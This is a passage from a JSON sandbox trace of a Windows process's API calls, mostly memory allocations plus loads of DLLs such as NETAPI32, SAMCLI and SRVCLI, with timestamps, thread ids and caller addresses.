                "name": "BaseAddress",
                "value": "0x21e2ba35000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 189
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F812-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 190
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba36000"
              },
              {
                "name": "RegionSize",
                "value": "0x00006000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 191
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "NTDLL.DLL"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee3470000"
              }
            ],
            "repeated": 0,
            "id": 192
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c125000"
              },
              {
                "name": "RegionSize",
                "value": "0x00009000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 193
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c12e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00011000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 194
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c125000"
              },
              {
                "name": "RegionSize",
                "value": "0x00019000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 195
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c13f000"
              },
              {
                "name": "RegionSize",
                "value": "0x00021000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 196
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba3c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 197
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba3f000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 198
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba42000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 199
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba45000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 200
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba48000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 201
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba4b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 202
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba4e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 203
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba51000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 204
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba54000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 205
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba57000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 206
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba5a000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 207
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba5b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 208
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba5e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 209
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba61000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 210
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba64000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 211
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba67000"
              },
              {
                "name": "RegionSize",
                "value": "0x00021000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 212
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba88000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 213
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4895",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba8d000"
              },
              {
                "name": "RegionSize",
                "value": "0x00012000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 214
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4895",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x00100000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 215
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4895",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x00004000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 216
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf48d0",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba3e000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000a000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 217
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf48d0",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba3e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00019000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 218
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf906c",
            "parentcaller": "0x7ff79aaf8cc3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba99000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 219
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4244",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79aaf906c",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc14000"
              },
              {
                "name": "RegionSize",
                "value": "0x00043000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 220
          },
          {
            "timestamp": "2025-11-20 10:58:33,866",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c125000"
              },
              {
                "name": "RegionSize",
                "value": "0x0001f000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 221
          },
          {
            "timestamp": "2025-11-20 10:58:33,866",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c147000"
              },
              {
                "name": "RegionSize",
                "value": "0x00018000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 222
          },
          {
            "timestamp": "2025-11-20 10:58:33,866",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\NETAPI32"
              },
              {
                "name": "DllBase",
                "value": "0x7ffec3b80000"
              }
            ],
            "repeated": 0,
            "id": 223
          },
          {
            "timestamp": "2025-11-20 10:58:33,866",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "NETAPI32.DLL"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffec3b80000"
              }
            ],
            "repeated": 0,
            "id": 224
          },
          {
            "timestamp": "2025-11-20 10:58:33,866",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000039c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\samcli.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 225
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003a8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5050000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00019000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 226
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\SAMCLI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed5050000"
              }
            ],
            "repeated": 0,
            "id": 227
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000039c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\srvcli.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 228
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003ac"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed6e00000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00028000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 229
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\SRVCLI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed6e00000"
              }
            ],
            "repeated": 0,
            "id": 230
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003ac"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\netutils.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 231
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003b0"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0060000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0000c000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 232
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\NETUTILS"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0060000"
              }
            ],
            "repeated": 0,
            "id": 233
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003ac"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
